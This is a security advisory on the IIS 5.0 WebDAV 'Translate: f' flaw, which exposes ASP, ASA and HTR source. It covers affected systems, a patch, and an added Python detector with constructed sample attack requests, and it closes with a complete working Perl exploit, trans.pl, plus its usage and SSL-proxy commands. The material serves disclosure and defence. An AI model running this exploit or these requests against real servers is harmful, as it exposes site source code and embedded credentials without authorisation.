A vulnerability in IIS allows remote attackers to view the source of the server-side scripts IIS serves (such as ASP, ASA and HTR files). This is particularly dangerous because these files frequently hold sensitive information, and programmers often rely on the source code being hidden from the user.
The vulnerability is triggered by sending a request whose headers end with 'Translate: f' and whose URL has a trailing slash '/' appended. It cannot be exploited from a standard browser, but the exploit code below can be used to test for the problem.
Credit:
The information has been provided by SMILER.
The exploit code was provided by Roelof Temmingh.
Vulnerable systems:
Microsoft Windows NT 2000 (IIS 5.0)
Windows NT 4.0 with FrontPage Server Extensions 2000
Immune systems:
Microsoft IIS 4.0 and below
The WebDAV implementation in Windows 2000 and Office 2000 (including FrontPage 2000 and FrontPage 2000 Server Extensions) is the source of the Translate: f problem.
When someone requests an ASP/ASA page (or any other scriptable page) and adds "Translate: f" to the headers of the HTTP GET request (headers are not part of the URL; they are part of the raw HTTP request), a serious security bug in Windows 2000 (when not patched with SP1) returns the complete ASP/ASA source instead of the processed file. A trailing slash "/" must be appended to the requested URL for this to work.
"Translate: f" is a legitimate WebDAV header and is being used as designed: adding it to an HTTP GET signals the WebDAV component to return the source of the requested file and bypass script processing. FrontPage 2000 and any WebDAV-compatible client use it to fetch a file for editing. It is supposed to be accompanied by other information that prevents unauthorized users from viewing the source. Unfortunately, a coding error makes it possible to retrieve those files simply by adding "Translate: f" to the headers and a "/" to the end of the GET request.
This is a Windows 2000 bug, but because FrontPage Server Extensions 2000 can be installed even on IIS 4.0 sites, it also affects IIS 4.0. Many IIS 4.0 sites exhibit the "Translate: f" bug when web files are stored on a shared (network) directory; that variant was fixed in the past (see our previous article: Patch Available for the Virtualized UNC Share Vulnerability).
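The mechanism described above gives a defender a precise signature: a GET (or HEAD) for a script file, a "Translate: f" header, and a trailing separator after the script name. The following is an added detection example written for this page; it is not part of the advisory and not Roelof Temmingh's trans.pl. Because the standard IIS log formats do not record arbitrary request headers, the example works on raw HTTP requests (as obtained from a packet capture or a front-end proxy, which is an assumption) and the sample requests it contains are constructed for the demonstration. It also grades the weaker case (Translate: f on a script path without the trailing separator) as medium, which goes slightly beyond the single case the advisory describes.

```python
"""Detect 'Translate: f' source-disclosure attempts in raw HTTP requests.

Added example for this advisory; not the advisory's or trans.pl's code.
Assumes raw request headers are available (packet capture or proxy log).
The sample requests below are constructed, not captured traffic.
"""
import re
from urllib.parse import urlsplit

# Script types IIS processes server-side; the advisory names ASP, ASA and HTR.
SCRIPT_EXTENSIONS = (".asp", ".asa", ".htr")
REQUEST_LINE = re.compile(r"^([A-Z]+)\s+(\S+)\s+HTTP/\d\.\d$")


def parse_request(raw):
    """Split a raw request into (method, target, headers).

    Header names are lower-cased and values stripped, so 'translate: F'
    is recognised as well as 'Translate: f'. Returns None if the request
    line is malformed.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    method, target = m.group(1), m.group(2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw):
    """Return a finding dict for a suspicious Translate: f request, else None."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, target, headers = parsed
    if headers.get("translate", "").lower() != "f":
        return None  # no Translate header: an ordinary request
    path = urlsplit(target).path
    # The trigger is a script path with a separator appended after the
    # extension: '/' as the advisory describes, or '\' as trans.pl sends.
    stripped = path.rstrip("/\\")
    trailing = stripped != path
    is_script = stripped.lower().endswith(SCRIPT_EXTENSIONS)
    if method in ("GET", "HEAD") and is_script and trailing:
        severity = "high"      # exact shape of the source-disclosure request
    elif is_script:
        severity = "medium"    # Translate: f aimed at a script, no separator
    else:
        return None            # Translate: f on static content: WebDAV editing
    return {"method": method, "path": path, "severity": severity}


def scan(requests):
    """Run classify() over many raw requests and keep only the findings."""
    return [f for f in map(classify, requests) if f]


SAMPLE_REQUESTS = [  # constructed samples for the demonstration
    "GET /login.asp/ HTTP/1.0\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "GET /login.asp\\ HTTP/1.0\r\nHost: www.example.com\r\n"
    "User-Agent: SensePostData\r\nTranslate: f\r\n\r\n",
    "GET /login.asp HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    "GET /global.asa HTTP/1.1\r\nHost: www.example.com\r\ntranslate: F\r\n\r\n",
    "GET /docs/readme.txt/ HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Run as-is, the script reports the two trailing-separator requests for login.asp as high and the bare global.asa request as medium; the request without a Translate header and the one for a text file produce no finding, which keeps ordinary WebDAV editing of non-script content out of the alert stream.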
Patch:
Microsoft has released the following patch, which eliminates this vulnerability:
Microsoft patch Q256888_W2K_SP1_x86_en
Exploit:
Typical usage:
$ perl trans.pl www.example.com login.asp 80
To use against SSL sites:
1) $ sslproxy -L 127.0.0.1 -l 7555 -R www.example.com -r 443 -v Class3.pem
2) $ perl trans.pl 127.0.0.1 login.asp 7555
---cut: trans.pl---
#!/usr/bin/perl
use strict;
use warnings;
use Socket;

#### test arguments
if ($#ARGV != 2) { die "usage: DNS_name/IP file_to_get port\n"; }

#### load values
my ($host, $toget, $port) = @ARGV;
my $target = inet_aton($host) || die "Cannot resolve $host\n";

#### build request: the script name gets a trailing backslash (the advisory
#### describes the same trick with '/') and the headers end with 'Translate: f';
#### the blank line terminates the header block
my $xtosend = <<EOT;
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
$xtosend =~ s/\n/\r\n/g;

#### send request
my @results = sendraw($xtosend);
print @results;

#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {    # this saves the whole transaction anyway
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        || die("Socket problems\n");
    # sockaddr_in builds the address portably (the original packed it by hand)
    if (connect(S, sockaddr_in($port, $target))) {
        my @in;
        select(S); $| = 1; print $pstr;
        while (<S>) { push @in, $_; }
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}
---cut----